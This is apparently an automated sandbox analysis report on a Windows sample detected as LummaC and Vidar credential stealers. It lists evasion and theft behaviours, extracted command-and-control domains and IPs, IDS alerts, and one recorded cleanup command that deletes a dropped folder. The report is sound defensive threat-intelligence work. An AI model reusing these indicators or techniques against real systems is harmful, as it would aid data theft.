Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519663
MD5:	e02a6087d9257c00071b3cc1508a95ef
SHA1:	8081f2bd757d470e08711133cfb7a4ca17f2fb1f
SHA256:	e0f1b468770374dc01046cd48f25609b5e04724a79323a049f02673ea0bcc811
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 368 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E02A6087D9257C00071B3CC1508A95EF)

conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 4024 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 2380 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

FBFHJJJDAF.exe (PID: 5352 cmdline: "C:\ProgramData\FBFHJJJDAF.exe" MD5: 16F5B27C9E1376C17B03BF8C5090DB3C)

conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 3648 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 4148 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 1268 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 6460 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

FIEHIIIJDA.exe (PID: 7164 cmdline: "C:\ProgramData\FIEHIIIJDA.exe" MD5: 2CCE29D734EA1D227B338834698E2DE4)

conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 1048 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 6696 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 2964 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IIDHJDGCGDAA" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 984 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["reinforcenh.shop", "stogeneratmns.shop", "gutterydhowi.shop", "vozmeatillu.shop", "offensivedzvju.shop", "ghostreedmnu.shop", "fragnantbui.shop", "drawzhotdog.shop"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "6c8ce6f422a1d9cf34f23d1c2168e754"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2053339176.0000000003465000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2053339176.0000000003465000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000007.00000002.2680623811.0000000003455000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 368	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 368	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 368	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 2380	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2380	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 2380	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2380	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 6696	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6696	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author
12.2.RegAsm.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
12.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
4.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
4.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.3465570.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.3465570.2.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.3465570.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.3465570.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
4.2.RegAsm.exe.400000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
4.2.RegAsm.exe.400000.1.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 5 entries

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:14:25.533528+0200	2028765	3	Unknown Traffic	192.168.2.5	49716	5.75.211.162	443	TCP
2024-09-26T20:14:26.699712+0200	2028765	3	Unknown Traffic	192.168.2.5	49717	5.75.211.162	443	TCP
2024-09-26T20:14:28.111725+0200	2028765	3	Unknown Traffic	192.168.2.5	49718	5.75.211.162	443	TCP
2024-09-26T20:14:29.523708+0200	2028765	3	Unknown Traffic	192.168.2.5	49719	5.75.211.162	443	TCP
2024-09-26T20:14:30.897295+0200	2028765	3	Unknown Traffic	192.168.2.5	49720	5.75.211.162	443	TCP
2024-09-26T20:14:32.363642+0200	2028765	3	Unknown Traffic	192.168.2.5	49721	5.75.211.162	443	TCP
2024-09-26T20:14:33.403813+0200	2028765	3	Unknown Traffic	192.168.2.5	49722	5.75.211.162	443	TCP
2024-09-26T20:14:36.898370+0200	2028765	3	Unknown Traffic	192.168.2.5	49723	5.75.211.162	443	TCP
2024-09-26T20:14:37.978244+0200	2028765	3	Unknown Traffic	192.168.2.5	49724	5.75.211.162	443	TCP
2024-09-26T20:14:39.132998+0200	2028765	3	Unknown Traffic	192.168.2.5	49725	5.75.211.162	443	TCP
2024-09-26T20:14:40.276515+0200	2028765	3	Unknown Traffic	192.168.2.5	49726	5.75.211.162	443	TCP
2024-09-26T20:14:42.021671+0200	2028765	3	Unknown Traffic	192.168.2.5	49727	5.75.211.162	443	TCP
2024-09-26T20:14:43.792662+0200	2028765	3	Unknown Traffic	192.168.2.5	49728	5.75.211.162	443	TCP
2024-09-26T20:14:45.483832+0200	2028765	3	Unknown Traffic	192.168.2.5	49729	5.75.211.162	443	TCP
2024-09-26T20:14:47.180155+0200	2028765	3	Unknown Traffic	192.168.2.5	49730	5.75.211.162	443	TCP
2024-09-26T20:14:48.525294+0200	2028765	3	Unknown Traffic	192.168.2.5	49731	5.75.211.162	443	TCP
2024-09-26T20:14:51.482510+0200	2028765	3	Unknown Traffic	192.168.2.5	49732	5.75.211.162	443	TCP
2024-09-26T20:14:52.769894+0200	2028765	3	Unknown Traffic	192.168.2.5	49733	5.75.211.162	443	TCP
2024-09-26T20:14:54.199581+0200	2028765	3	Unknown Traffic	192.168.2.5	49734	5.75.211.162	443	TCP
2024-09-26T20:14:55.599886+0200	2028765	3	Unknown Traffic	192.168.2.5	49735	5.75.211.162	443	TCP
2024-09-26T20:14:57.690897+0200	2028765	3	Unknown Traffic	192.168.2.5	49737	5.75.211.162	443	TCP
2024-09-26T20:14:59.711457+0200	2028765	3	Unknown Traffic	192.168.2.5	49738	5.75.211.162	443	TCP
2024-09-26T20:15:04.005893+0200	2028765	3	Unknown Traffic	192.168.2.5	49740	5.75.211.162	443	TCP
2024-09-26T20:15:08.377162+0200	2028765	3	Unknown Traffic	192.168.2.5	49746	5.75.211.162	443	TCP
2024-09-26T20:15:10.822931+0200	2028765	3	Unknown Traffic	192.168.2.5	49749	5.75.211.162	443	TCP
2024-09-26T20:15:39.619646+0200	2028765	3	Unknown Traffic	192.168.2.5	49758	5.75.211.162	443	TCP
2024-09-26T20:15:40.921560+0200	2028765	3	Unknown Traffic	192.168.2.5	49759	5.75.211.162	443	TCP
2024-09-26T20:15:42.308011+0200	2028765	3	Unknown Traffic	192.168.2.5	49760	5.75.211.162	443	TCP
2024-09-26T20:15:43.666845+0200	2028765	3	Unknown Traffic	192.168.2.5	49761	5.75.211.162	443	TCP
2024-09-26T20:15:45.015846+0200	2028765	3	Unknown Traffic	192.168.2.5	49762	5.75.211.162	443	TCP
2024-09-26T20:15:46.413846+0200	2028765	3	Unknown Traffic	192.168.2.5	49763	5.75.211.162	443	TCP
2024-09-26T20:15:47.412398+0200	2028765	3	Unknown Traffic	192.168.2.5	49764	5.75.211.162	443	TCP
2024-09-26T20:15:50.364989+0200	2028765	3	Unknown Traffic	192.168.2.5	49765	5.75.211.162	443	TCP
2024-09-26T20:15:51.480047+0200	2028765	3	Unknown Traffic	192.168.2.5	49766	5.75.211.162	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:04.673123+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49741	188.114.96.3	443	TCP
2024-09-26T20:15:05.660006+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49742	172.67.132.32	443	TCP
2024-09-26T20:15:06.782806+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49744	188.114.96.3	443	TCP
2024-09-26T20:15:07.757120+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49745	188.114.97.3	443	TCP
2024-09-26T20:15:08.851472+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49747	188.114.96.3	443	TCP
2024-09-26T20:15:10.629211+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49748	172.67.162.108	443	TCP
2024-09-26T20:15:11.606480+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49750	188.114.96.3	443	TCP
2024-09-26T20:15:12.629221+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49752	188.114.97.3	443	TCP
2024-09-26T20:15:13.637552+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49753	172.67.208.139	443	TCP
2024-09-26T20:15:15.906884+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49755	104.21.2.13	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:04.673123+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49741	188.114.96.3	443	TCP
2024-09-26T20:15:05.660006+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49742	172.67.132.32	443	TCP
2024-09-26T20:15:06.782806+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49744	188.114.96.3	443	TCP
2024-09-26T20:15:07.757120+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49745	188.114.97.3	443	TCP
2024-09-26T20:15:08.851472+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49747	188.114.96.3	443	TCP
2024-09-26T20:15:10.629211+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49748	172.67.162.108	443	TCP
2024-09-26T20:15:11.606480+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49750	188.114.96.3	443	TCP
2024-09-26T20:15:12.629221+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49752	188.114.97.3	443	TCP
2024-09-26T20:15:13.637552+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49753	172.67.208.139	443	TCP
2024-09-26T20:15:15.906884+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49755	104.21.2.13	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:10.172517+0200	2056157	1	Domain Observed Used for C2 Detected	192.168.2.5	49748	172.67.162.108	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:11.124806+0200	2056155	1	Domain Observed Used for C2 Detected	192.168.2.5	49750	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:04.195932+0200	2056163	1	Domain Observed Used for C2 Detected	192.168.2.5	49741	188.114.96.3	443	TCP
2024-09-26T20:15:06.211464+0200	2056163	1	Domain Observed Used for C2 Detected	192.168.2.5	49744	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:05.194897+0200	2056165	1	Domain Observed Used for C2 Detected	192.168.2.5	49742	172.67.132.32	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:07.279932+0200	2056161	1	Domain Observed Used for C2 Detected	192.168.2.5	49745	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:13.174833+0200	2056151	1	Domain Observed Used for C2 Detected	192.168.2.5	49753	172.67.208.139	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:12.152000+0200	2056153	1	Domain Observed Used for C2 Detected	192.168.2.5	49752	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:08.326468+0200	2056159	1	Domain Observed Used for C2 Detected	192.168.2.5	49747	188.114.96.3	443	TCP

ET MALWARE Vidar Stealer Form Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:12.353249+0200	2054495	1	A Network Trojan was detected	192.168.2.5	49751	45.132.206.251	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:08.854602+0200	2056156	1	Domain Observed Used for C2 Detected	192.168.2.5	53384	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:10.632491+0200	2056154	1	Domain Observed Used for C2 Detected	192.168.2.5	63469	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:03.681283+0200	2056162	1	Domain Observed Used for C2 Detected	192.168.2.5	50647	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:04.677174+0200	2056164	1	Domain Observed Used for C2 Detected	192.168.2.5	57503	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:06.785777+0200	2056160	1	Domain Observed Used for C2 Detected	192.168.2.5	61063	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:12.658468+0200	2056150	1	Domain Observed Used for C2 Detected	192.168.2.5	60357	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:11.608917+0200	2056152	1	Domain Observed Used for C2 Detected	192.168.2.5	65058	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:07.796964+0200	2056158	1	Domain Observed Used for C2 Detected	192.168.2.5	60331	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:14:30.233148+0200	2044247	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.5	49719	TCP
2024-09-26T20:15:44.368415+0200	2044247	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.5	49761	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:14:31.608429+0200	2051831	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.5	49720	TCP
2024-09-26T20:15:45.703035+0200	2051831	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.5	49762	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:14:28.830459+0200	2049087	1	A Network Trojan was detected	192.168.2.5	49718	5.75.211.162	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T20:15:02.153136+0200	2803270	2	Potentially Bad Traffic	192.168.2.5	49739	172.105.54.160	443	TCP
2024-09-26T20:15:06.467974+0200	2803270	2	Potentially Bad Traffic	192.168.2.5	49743	172.105.54.160	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://5.75.211.162/mozglue.dll9ap	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/msvcp140.dll7az	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/ECGCAEBFI	Avira URL Cloud: Label: malware
Source: reinforcenh.shop	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/mozglue.dll	Avira URL Cloud: Label: malware
Source: stogeneratmns.shop	Avira URL Cloud: Label: malware
Source: https://vozmeatillu.shop/apiR	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/api	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/freebl3.dll	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869/badges	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/ff	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/mozglue.dll_a	Avira URL Cloud: Label: malware
Source: https://ghostreedmnu.shop/apiES	Avira URL Cloud: Label: malware
Source: ghostreedmnu.shop	Avira URL Cloud: Label: malware
Source: https://5.75.211.162	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/freebl3.dllia	Avira URL Cloud: Label: malware
Source: https://t.me/ae5ed	Avira URL Cloud: Label: malware
Source: https://vozmeatillu.shop/api	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/msvcp140.dllAa	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/-	Avira URL Cloud: Label: malware
Source: fragnantbui.shop	Avira URL Cloud: Label: malware
Source: https://offensivedzvju.shop/api	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/softokn3.dllga	Avira URL Cloud: Label: malware
Source: drawzhotdog.shop	Avira URL Cloud: Label: malware
Source: offensivedzvju.shop	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/L	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/sqlp.dllW1	Avira URL Cloud: Label: malware
Source: vozmeatillu.shop	Avira URL Cloud: Label: malware
Source: https://drawzhotdog.shop/api	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/vcruntime140.dllmc	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.2053339176.0000000003465000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "6c8ce6f422a1d9cf34f23d1c2168e754"}
Source: 12.2.RegAsm.exe.400000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["reinforcenh.shop", "stogeneratmns.shop", "gutterydhowi.shop", "vozmeatillu.shop", "offensivedzvju.shop", "ghostreedmnu.shop", "fragnantbui.shop", "drawzhotdog.shop"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\FIEHIIIJDA.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vdshfd[1].exe	ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Sample uses string decryption to hide its real strings

Source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: reinforcenh.shop
Source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stogeneratmns.shop
Source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fragnantbui.shop
Source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: drawzhotdog.shop
Source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: vozmeatillu.shop
